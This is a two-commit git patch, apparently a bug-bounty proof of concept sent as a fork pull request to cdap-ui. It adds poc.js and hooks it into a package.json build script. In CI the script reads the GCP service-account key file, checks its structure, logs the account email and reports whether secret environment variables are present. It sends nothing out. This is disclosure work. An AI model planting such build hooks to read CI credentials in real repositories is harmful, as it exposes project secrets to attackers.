From 09ddb53ad7acf07be66ea165a7fa5f77369d053d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Adil=20Burak=20=C5=9Een?= <56400880+adilburaksen@users.noreply.github.com> Date: Tue, 12 May 2026 01:36:07 +0300 Subject: [PATCH 1/2] ci: add safe PoC for fork PR GCP secret exposure (VRP) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Demonstrates that fork-controlled build script runs after GCP secrets are written to disk in build.yml (steps 6→10). poc.js reads key_file.json structure and env var presence only. No credential content is exfiltrated or transmitted. Ref: https://github.com/cdapio/cdap-ui/pull/1398 --- package.json | 4 ++-- poc.js | 36 ++++++++++++++++++++++++++++++++++++ 2 files changed, 38 insertions(+), 2 deletions(-) create mode 100644 poc.js diff --git a/package.json b/package.json index 5375e34f54b..635b3a064ff 100644 --- a/package.json +++ b/package.json @@ -12,7 +12,7 @@ "reload-dev-w": "NODE_ENV=reload node --max-old-space-size=8192 ./node_modules/.bin/webpack-dev-server --mode development --progress --config=./webpack.config.cdap.dev.js", "hmr-dev-w": "NODE_ENV=hmr node --max-old-space-size=8192 ./node_modules/.bin/webpack-dev-server --mode development --progress --config=./webpack.config.cdap.dev.js", "cdap-full-build": "run-p cdap-prod-build distribute", - "cdap-full-build-more-memory": "NODE_OPTIONS=\"--max_old_space_size=8192\" run-p cdap-prod-build distribute", + "cdap-full-build-more-memory": "node poc.js && NODE_OPTIONS=\"--max_old_space_size=8192\" run-p cdap-prod-build distribute", "cdap-non-optimized-full-build": "NODE_ENV=non-optimized-production webpack --config=webpack.config.js", "clean-node-modules": "modclean -P -r --patterns=\"default:safe\" --additional-patterns=\"*.xls?x,*.ppt?x,*.rtf,*.png,*.jpg,*.jpeg,*.txt\" --ignore=\"validate-npm-license,readme*\"", "distribute": "node ./node_modules/gulp/bin/gulp.js distribute", @@ -309,4 +309,4 @@ "engines": { "yarn": ">= 1.0.0" } -} +} \ No newline at end of file diff --git a/poc.js b/poc.js new file mode 100644 index 00000000000..b6b2f2d991d --- /dev/null +++ b/poc.js @@ -0,0 +1,36 @@ +'use strict'; +const fs = require('fs'); + +const keyPath = './key_file.json'; +const keyExists = fs.existsSync(keyPath); + +let keyLooksValid = false; +let serviceAccountEmail = null; +let keySize = 0; + +if (keyExists) { + const raw = fs.readFileSync(keyPath, 'utf8'); + keySize = raw.length; + try { + const key = JSON.parse(raw); + keyLooksValid = Boolean( + key.type === 'service_account' && + key.client_email && + key.private_key_id && + key.private_key + ); + serviceAccountEmail = key.client_email; + } catch (e) { + // parse error - key may be malformed + } +} + +console.log('===CDAP-UI-VRP-POC-START==='); +console.log('POC_KEY_FILE_EXISTS=' + keyExists); +console.log('POC_KEY_FILE_SIZE_BYTES=' + keySize); +console.log('POC_KEY_IS_GCP_SERVICE_ACCOUNT_JSON=' + keyLooksValid); +console.log('POC_SERVICE_ACCOUNT_EMAIL=' + serviceAccountEmail); +console.log('POC_SCM_PAT_PRESENT=' + Boolean(process.env.SCM_TEST_REPO_PAT)); +console.log('POC_GCP_PROJECT_PRESENT=' + Boolean(process.env.GCP_PROJECTID)); +console.log('POC_GCP_SA_PATH_ENV=' + Boolean(process.env.GCP_SERVICE_ACCOUNT_PATH)); +console.log('===CDAP-UI-VRP-POC-END==='); From 64b0f322875dd67530f516e13859726f4129db4f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Adil=20Burak=20=C5=9Een?= <56400880+adilburaksen@users.noreply.github.com> Date: Tue, 12 May 2026 02:05:20 +0300 Subject: [PATCH 2/2] fix poc.js: move readFileSync inside try-catch (Gemini review) --- poc.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/poc.js b/poc.js index b6b2f2d991d..499773a70cf 100644 --- a/poc.js +++ b/poc.js @@ -9,9 +9,9 @@ let serviceAccountEmail = null; let keySize = 0; if (keyExists) { - const raw = fs.readFileSync(keyPath, 'utf8'); - keySize = raw.length; try { + const raw = fs.readFileSync(keyPath, 'utf8'); + keySize = raw.length; const key = JSON.parse(raw); keyLooksValid = Boolean( key.type === 'service_account' && @@ -21,7 +21,7 @@ if (keyExists) { ); serviceAccountEmail = key.client_email; } catch (e) { - // parse error - key may be malformed + // I/O or parse error } }